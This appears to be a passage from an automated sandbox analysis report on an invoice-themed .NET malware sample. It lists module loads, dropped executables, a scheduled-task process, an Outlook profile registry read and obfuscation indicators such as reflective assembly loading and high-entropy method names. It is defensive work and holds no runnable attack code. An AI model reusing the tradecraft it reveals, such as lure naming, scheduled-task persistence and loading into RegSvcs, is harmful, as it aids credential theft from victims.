                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\Total Invoices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Total Invoices.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Total Invoices.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Total Invoices.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Total Invoices.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: RegSvcs.pdb, source: GUIVTme.exe, 0000000F.00000000.1828432542.00000000007B2000.00000002.00000001.01000000.0000000E.sdmp, GUIVTme.exe.8.dr
                      Source: Binary string: aDox.pdbSHA256 source: Total Invoices.exe, dWXyZYb.exe.0.dr
                      Source: Binary string: RegSvcs.pdb source: GUIVTme.exe, 0000000F.00000000.1828432542.00000000007B2000.00000002.00000001.01000000.0000000E.sdmp, GUIVTme.exe.8.dr
                      Source: Binary string: aDox.pdb source: Total Invoices.exe, dWXyZYb.exe.0.dr

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: Total Invoices.exe, MainForm.cs.Net Code: InitializeComponent
                      Source: dWXyZYb.exe.0.dr, MainForm.cs.Net Code: InitializeComponent
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, F65Zujn1AyWNBvASQN.cs.Net Code: UwuCAxNgU3 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Total Invoices.exe.31a42d0.5.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, F65Zujn1AyWNBvASQN.cs.Net Code: UwuCAxNgU3 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Total Invoices.exe.59b0000.13.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07AD3EB2 push esp; iretd 0_2_07AD3EB9
                      Source: C:\Users\user\Desktop\Total Invoices.exeCode function: 0_2_07AD0849 push esp; iretd 0_2_07AD0851
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0646F544 push es; iretd 8_2_0646F548
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0646F549 push es; iretd 8_2_0646F554
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0646F555 push es; iretd 8_2_0646F55C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0646F56D push es; iretd 8_2_0646F570
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0646F571 push es; iretd 8_2_0646F57C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0646F57D push es; iretd 8_2_0646F588
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0646F510 push es; iretd 8_2_0646F51C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0646F51D push es; iretd 8_2_0646F520
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0646F521 push es; iretd 8_2_0646F524
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0646F5CD push es; iretd 8_2_0646F5DC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0646F5C9 push es; iretd 8_2_0646F5CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0646F5DD push es; iretd 8_2_0646F5E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0646F595 push es; iretd 8_2_0646F5C8
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeCode function: 9_2_09903EB2 push esp; iretd 9_2_09903EB9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05D4A0DD push es; retf 13_2_05D4A0DE
                      Source: Total Invoices.exeStatic PE information: section name: .text entropy: 7.983017215615163
                      Source: dWXyZYb.exe.0.drStatic PE information: section name: .text entropy: 7.983017215615163
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, buAHWK3lB2t9VXVM8a.csHigh entropy of concatenated method names: 'M7v9rIOBui', 'lFK92g2mNb', 'lmTNhUqn59', 'TNkNdTGnxJ', 'ecX9tfhaQi', 'mtX9imhk7c', 'R4d93bHOKE', 'G2j9pN2gMY', 'VxQ9oFt8AL', 'Co29bFpJcw'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, raMx1YCmhbZF0jKmTA.csHigh entropy of concatenated method names: 'MgRgpyYNU7', 'Af3go4IlrL', 'FlvgbaUQ69', 'FS8g00PiSN', 'YW8gDfYJSM', 'pqOg7Dfyew', 'bhYgnkNLRq', 'JI3grkSelA', 'QROgWIsnPY', 'SZ3g2iHVcT'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, uwjLjYEyXrAYNZsh8f.csHigh entropy of concatenated method names: 'mSVkBtJlgj', 'BjIkiNTJjc', 'CZLkpObvYC', 'IBOkoxa6ak', 'T48klhrjqP', 'p2skI5L8FS', 'BBAkqiRaSC', 'jn7kjN4DC0', 'U4JkGAKust', 'Uluk6ebfef'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, Pb2iVjKMTdGXDxXKxm.csHigh entropy of concatenated method names: 'Dispose', 'VAQdWmLlpI', 'puhxldbYkR', 'lF2HHTUbR0', 'T41d21lUxI', 'jtndzVfGfp', 'ProcessDialogKey', 'KCUxhRwdri', 'vIpxdgyOYM', 'mJ1xxySsgK'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, w24Fba77wypiBybTx6.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Y7xxWNnhU2', 'rVOx2gSS9O', 'zjsxzGwrIr', 'HPHZhahMsx', 'wlyZdQQLx8', 'TBrZxgjn14', 'Uw2ZZ5ZjRG', 'l15m3gauKD06BcFSADQ'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, WWfXRVyciXHPleu4LT.csHigh entropy of concatenated method names: 'HEcdS71BHu', 'NbFdOOdnxQ', 'BtXdfsaA1K', 'a86dXj5LQ0', 'tPAdkvnMHr', 'mqedQstM75', 'eAWSZ2bAKSc6ChfxcQ', 'NrU5OJLqQ9OTSTmZTU', 'MAbddkhXK9', 'TqbdZsW84v'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, OpxKWOkgLHaB0xbjWH.csHigh entropy of concatenated method names: 'IOJS5S4qf2', 'wE2SPeU6eX', 'hU5S8MA3ND', 'q9B82vNj1W', 'XAQ8zvg5At', 'JJoShS4oWO', 'e2wSdnTYTT', 'ootSx5mvAC', 'BhKSZBhwv0', 'AgISCQhA6A'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, iJbdw4ZlwaYgFWE45o.csHigh entropy of concatenated method names: 'm84AVgcw2', 'MlamVMrts', 'sbXLEGIYi', 'bEIvEAS0A', 'wjDsvUr0t', 'KaMU0Y96D', 'LoEtXHZDuJwoV8Bl1d', 'nBNxg6k5w4C8TWDIcT', 'xmbNnVcAQ', 'd6kRQuIgJ'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, F65Zujn1AyWNBvASQN.csHigh entropy of concatenated method names: 'gZEZFIpGDb', 'Om8Z5hq7WG', 'hciZghsqvo', 'znvZPKgH84', 'vVAZuShmAg', 'Ea9Z8nUtff', 'NTZZSeBUrj', 'WU5ZOJWxH2', 'hIEZYHjvkK', 'MNyZfKqSuC'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, roV4m4FiW8Iqy5m7IY.csHigh entropy of concatenated method names: 'bpKuJcqcFH', 'DnMuvu7QAe', 'CYOPINElN7', 'QH5PqYOr6P', 'pdIPjHhqee', 'kIMPGuScZD', 'f8rP65rkKL', 'gSQPwvwUVj', 'py0PVld1ig', 'OMHPBeNc1i'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, R1jScK2BX0NZW28vGm.csHigh entropy of concatenated method names: 'NkFPmJDBQp', 'jv6PLRoqpi', 'PMJPTP5Ioa', 'eICPsQlXbR', 'sDpPkKV3vo', 'Gc8PQvXMw6', 'gcbP9PsSA8', 'JraPNVLD6W', 'YJZPayFLfE', 'JuwPRH7KnT'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, bV0kqGNJKV9MCk2FwgH.csHigh entropy of concatenated method names: 'TZlaM17yXp', 'gguaKZQQol', 'QQjaAmu5Oq', 'D3RamF9uRK', 'zc0aJJNUXR', 'qSaaLUhuBJ', 'vVhavH9XCI', 'ns8aToED4Z', 'Aw9asqoP9t', 'gWwaUfxQCg'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, d5mxGlNuelYhX2W4yxP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LG1Rpp2LRw', 'mtWRoSpr0V', 'dgrRbGBTS7', 'd6dR02ay5W', 'aqlRD33AB3', 'TmSR7xFhHb', 'AUpRnADZmZ'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, Fop1vsIro4KLWDA10i.csHigh entropy of concatenated method names: 'lwv8FYNQT6', 'aqQ8gDd4Nc', 'U5S8uuIG0v', 'Rbm8SEoNCC', 'C9u8OkYqtx', 'ToduDfHpr5', 'FfFu7k1UVM', 'nlSun4XwEe', 'yGfurdiNiJ', 'SIBuWpPIli'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, i1S4jZmGiGcHh2VLvV.csHigh entropy of concatenated method names: 'soP1TjA4B8', 'TQb1s6T2vS', 'EoE1E7YEmZ', 'zEi1lBltBt', 'CLR1qiHOn2', 's3S1jShCTG', 'Jic16jD40V', 'Ahx1wRLGim', 'bCg1BU9Adm', 'RKB1t1vhT0'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, CrXs7oYO2FVLxbtdIy.csHigh entropy of concatenated method names: 'IUhN5KRB8v', 'PC8NgYWY3C', 'iBnNPn9Qmi', 'I3cNu6NGDa', 'tIPN8YZf7s', 'mNLNSDSLje', 'VkYNOZPx2H', 'VZxNY7nPy0', 'FmYNf6ya8p', 'WJuNXd0b6K'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, InnAJ7csc1jKjsF8ad.csHigh entropy of concatenated method names: 'SH7SMEuPvn', 'XDgSKJ7YLu', 'n76SA7bcmP', 'jACSmyVur5', 'wqLSJCDkBX', 'ShoSLbm3v2', 'f27SvPFRM7', 'AtpSTHrWOq', 'eL4SshApin', 'PRDSUjErTx'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, g3NmbNlXaSiobDsXBy.csHigh entropy of concatenated method names: 'GxMadr4R6C', 'S5taZRw6s1', 'u5FaC2sav9', 'WELa5d8C6d', 'ewDagFbV2G', 'Xa2auscu6p', 'apMa8P8ljG', 'CLyNnjH4p9', 'Aa7NrlRkeo', 'BZ1NWhIpKe'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, iVR7yJzOnBXclf4yqE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aa5a1URC9g', 'VcuakA9KiD', 'qBWaQs53Wf', 'SPra9cavTQ', 'TD4aNNjL1E', 'AWcaaSdAi7', 'jlgaRmemiy'
                      Source: 0.2.Total Invoices.exe.4d666a0.9.raw.unpack, rKLqexOag3LmFqHckP.csHigh entropy of concatenated method names: 'ybgNEN8MS5', 'MKlNlNZSCS', 'WbNNIsdf5u', 'tWRNqDhfno', 'pwGNpEyikQ', 'Qv1NjrKZKi', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, buAHWK3lB2t9VXVM8a.csHigh entropy of concatenated method names: 'M7v9rIOBui', 'lFK92g2mNb', 'lmTNhUqn59', 'TNkNdTGnxJ', 'ecX9tfhaQi', 'mtX9imhk7c', 'R4d93bHOKE', 'G2j9pN2gMY', 'VxQ9oFt8AL', 'Co29bFpJcw'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, raMx1YCmhbZF0jKmTA.csHigh entropy of concatenated method names: 'MgRgpyYNU7', 'Af3go4IlrL', 'FlvgbaUQ69', 'FS8g00PiSN', 'YW8gDfYJSM', 'pqOg7Dfyew', 'bhYgnkNLRq', 'JI3grkSelA', 'QROgWIsnPY', 'SZ3g2iHVcT'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, uwjLjYEyXrAYNZsh8f.csHigh entropy of concatenated method names: 'mSVkBtJlgj', 'BjIkiNTJjc', 'CZLkpObvYC', 'IBOkoxa6ak', 'T48klhrjqP', 'p2skI5L8FS', 'BBAkqiRaSC', 'jn7kjN4DC0', 'U4JkGAKust', 'Uluk6ebfef'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, Pb2iVjKMTdGXDxXKxm.csHigh entropy of concatenated method names: 'Dispose', 'VAQdWmLlpI', 'puhxldbYkR', 'lF2HHTUbR0', 'T41d21lUxI', 'jtndzVfGfp', 'ProcessDialogKey', 'KCUxhRwdri', 'vIpxdgyOYM', 'mJ1xxySsgK'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, w24Fba77wypiBybTx6.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Y7xxWNnhU2', 'rVOx2gSS9O', 'zjsxzGwrIr', 'HPHZhahMsx', 'wlyZdQQLx8', 'TBrZxgjn14', 'Uw2ZZ5ZjRG', 'l15m3gauKD06BcFSADQ'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, WWfXRVyciXHPleu4LT.csHigh entropy of concatenated method names: 'HEcdS71BHu', 'NbFdOOdnxQ', 'BtXdfsaA1K', 'a86dXj5LQ0', 'tPAdkvnMHr', 'mqedQstM75', 'eAWSZ2bAKSc6ChfxcQ', 'NrU5OJLqQ9OTSTmZTU', 'MAbddkhXK9', 'TqbdZsW84v'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, OpxKWOkgLHaB0xbjWH.csHigh entropy of concatenated method names: 'IOJS5S4qf2', 'wE2SPeU6eX', 'hU5S8MA3ND', 'q9B82vNj1W', 'XAQ8zvg5At', 'JJoShS4oWO', 'e2wSdnTYTT', 'ootSx5mvAC', 'BhKSZBhwv0', 'AgISCQhA6A'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, iJbdw4ZlwaYgFWE45o.csHigh entropy of concatenated method names: 'm84AVgcw2', 'MlamVMrts', 'sbXLEGIYi', 'bEIvEAS0A', 'wjDsvUr0t', 'KaMU0Y96D', 'LoEtXHZDuJwoV8Bl1d', 'nBNxg6k5w4C8TWDIcT', 'xmbNnVcAQ', 'd6kRQuIgJ'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, F65Zujn1AyWNBvASQN.csHigh entropy of concatenated method names: 'gZEZFIpGDb', 'Om8Z5hq7WG', 'hciZghsqvo', 'znvZPKgH84', 'vVAZuShmAg', 'Ea9Z8nUtff', 'NTZZSeBUrj', 'WU5ZOJWxH2', 'hIEZYHjvkK', 'MNyZfKqSuC'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, roV4m4FiW8Iqy5m7IY.csHigh entropy of concatenated method names: 'bpKuJcqcFH', 'DnMuvu7QAe', 'CYOPINElN7', 'QH5PqYOr6P', 'pdIPjHhqee', 'kIMPGuScZD', 'f8rP65rkKL', 'gSQPwvwUVj', 'py0PVld1ig', 'OMHPBeNc1i'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, R1jScK2BX0NZW28vGm.csHigh entropy of concatenated method names: 'NkFPmJDBQp', 'jv6PLRoqpi', 'PMJPTP5Ioa', 'eICPsQlXbR', 'sDpPkKV3vo', 'Gc8PQvXMw6', 'gcbP9PsSA8', 'JraPNVLD6W', 'YJZPayFLfE', 'JuwPRH7KnT'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, bV0kqGNJKV9MCk2FwgH.csHigh entropy of concatenated method names: 'TZlaM17yXp', 'gguaKZQQol', 'QQjaAmu5Oq', 'D3RamF9uRK', 'zc0aJJNUXR', 'qSaaLUhuBJ', 'vVhavH9XCI', 'ns8aToED4Z', 'Aw9asqoP9t', 'gWwaUfxQCg'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, d5mxGlNuelYhX2W4yxP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LG1Rpp2LRw', 'mtWRoSpr0V', 'dgrRbGBTS7', 'd6dR02ay5W', 'aqlRD33AB3', 'TmSR7xFhHb', 'AUpRnADZmZ'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, Fop1vsIro4KLWDA10i.csHigh entropy of concatenated method names: 'lwv8FYNQT6', 'aqQ8gDd4Nc', 'U5S8uuIG0v', 'Rbm8SEoNCC', 'C9u8OkYqtx', 'ToduDfHpr5', 'FfFu7k1UVM', 'nlSun4XwEe', 'yGfurdiNiJ', 'SIBuWpPIli'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, i1S4jZmGiGcHh2VLvV.csHigh entropy of concatenated method names: 'soP1TjA4B8', 'TQb1s6T2vS', 'EoE1E7YEmZ', 'zEi1lBltBt', 'CLR1qiHOn2', 's3S1jShCTG', 'Jic16jD40V', 'Ahx1wRLGim', 'bCg1BU9Adm', 'RKB1t1vhT0'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, CrXs7oYO2FVLxbtdIy.csHigh entropy of concatenated method names: 'IUhN5KRB8v', 'PC8NgYWY3C', 'iBnNPn9Qmi', 'I3cNu6NGDa', 'tIPN8YZf7s', 'mNLNSDSLje', 'VkYNOZPx2H', 'VZxNY7nPy0', 'FmYNf6ya8p', 'WJuNXd0b6K'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, InnAJ7csc1jKjsF8ad.csHigh entropy of concatenated method names: 'SH7SMEuPvn', 'XDgSKJ7YLu', 'n76SA7bcmP', 'jACSmyVur5', 'wqLSJCDkBX', 'ShoSLbm3v2', 'f27SvPFRM7', 'AtpSTHrWOq', 'eL4SshApin', 'PRDSUjErTx'
                      Source: 0.2.Total Invoices.exe.4de30c0.12.raw.unpack, g3NmbNlXaSiobDsXBy.csHigh entropy of concatenated method names: 'GxMadr4R6C', 'S5taZRw6s1', 'u5FaC2sav9', 'WELa5d8C6d', 'ewDagFbV2G', 'Xa2auscu6p', 'apMa8P8ljG', 'CLyNnjH4p9', 'Aa7NrlRkeo', 'BZ1NWhIpKe'
